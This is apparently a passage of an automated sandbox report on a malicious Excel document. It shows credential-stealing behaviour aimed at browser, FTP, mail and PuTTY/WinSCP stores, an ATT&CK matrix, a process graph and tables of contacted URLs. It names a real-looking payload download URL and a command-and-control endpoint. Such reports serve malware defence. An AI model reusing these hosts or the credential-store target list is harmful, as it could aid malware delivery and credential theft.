                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: PopPassword
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: SmtpPassword
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1Scripting31Valid Accounts1Valid Accounts1Disable or Modify Tools11OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Access Token Manipulation11Deobfuscate/Decode Files or Information111Credentials in Registry2File and Directory Discovery3Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsCommand and Scripting Interpreter11Logon Script (Windows)Process Injection311Scripting31Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsPowerShell2Logon Script (Mac)Registry Run Keys / Startup Folder1Obfuscated Files or Information3NTDSQuery Registry1Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsSecurity Software Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion2Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation11/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection311Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 336301 Sample: 6Cprm97UTl Startdate: 05/01/2021 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->67 69 9 other signatures 2->69 10 EXCEL.EXE 83 29 2->10         started        13 ntrwe.exe 2->13         started        16 ntrwe.exe 2 2->16         started        process3 file4 85 Obfuscated command line found 10->85 87 Document exploit detected (process start blacklist hit) 10->87 18 cmd.exe 10->18         started        21 cmd.exe 10->21         started        23 cmd.exe 10->23         started        55 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 13->55 dropped 89 Writes to foreign memory regions 13->89 91 Allocates memory in foreign processes 13->91 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->93 95 Injects a PE file into a foreign processes 13->95 signatures5 process6 signatures7 71 Obfuscated command line found 18->71 25 powershell.exe 7 18->25         started        27 powershell.exe 16 9 21->27         started        32 RegAsm.exe 21->32         started        34 powershell.exe 7 23->34         started        process8 dnsIp9 36 12.exe 5 25->36         started        57 bighoreca.nl 83.172.144.37, 49167, 80 NEDZONE-ASNL Netherlands 27->57 59 cutt.ly 104.22.0.232, 443, 49165 CLOUDFLARENETUS United States 27->59 53 C:\Users\user\Documents\12.exe, PE32 27->53 dropped 97 Drops PE files to the document folder of the user 27->97 99 Powershell drops PE file 27->99 file10 signatures11 process12 file13 51 C:\Users\user\ntrwe.exe, PE32 36->51 dropped 73 Drops PE files to the user root directory 36->73 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->75 40 ntrwe.exe 2 36->40         started        43 cmd.exe 36->43         started        signatures14 process15 signatures16 77 Machine Learning detection for dropped file 40->77 79 Writes to foreign memory regions 40->79 81 Allocates memory in foreign processes 40->81 83 2 other signatures 40->83 45 RegAsm.exe 54 40->45         started        49 reg.exe 1 43->49         started        process17 dnsIp18 61 185.206.215.56, 49168, 49169, 49170 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 45->61 101 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->101 103 Tries to steal Mail credentials (via file registry) 45->103 105 Tries to steal Mail credentials (via file access) 45->105 107 2 other signatures 45->107 signatures19

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Documents\12.exe100%Joe Sandbox ML
                C:\Users\user\ntrwe.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                17.2.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.2.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://www.certifikat.dk/repository00%Avira URL Cloudsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.globaltrust.info0=0%Avira URL Cloudsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://crl.oces.certifikat.dk/oces.crl00%Avira URL Cloudsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe0%Avira URL Cloudsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl00%Avira URL Cloudsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cutt.ly
                		104.22.0.232
                		truetrue
                  		unknown
                  bighoreca.nl
                  		83.172.144.37
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://bighoreca.nl/wp-content/themes/index/QPR-3067.exetrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.206.215.56/morx/1/cgi.phptrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.a-cert.at0Epowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.e-me.lv/repository0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.acabogacia.org/doc0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpfalse
                      		high
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.certifikat.dk/repository0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.chambersign.org1powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://repository.swisssign.com/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        		high
                        http://crl.ssc.lt/root-c/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.sk.ee/cps/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.globaltrust.info0=powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://servername/isapibackend.dllpowershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.ssc.lt/cps03powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.windows.com/pctv.12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                          		high
                          http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.pki.gva.es0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.certicamara.com/dpc/0Zpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                            		high
                            http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                              		high
                              http://www.dnie.es/dpc0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.trustcenter.de/guidelines0powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.globaltrust.info0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpfalse
                                		high
                                http://www.certplus.com/CRL/class3TS.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpfalse
                                      		high
                                      https://www.catcert.net/verarrelpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.disig.sk/ca0fpowershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
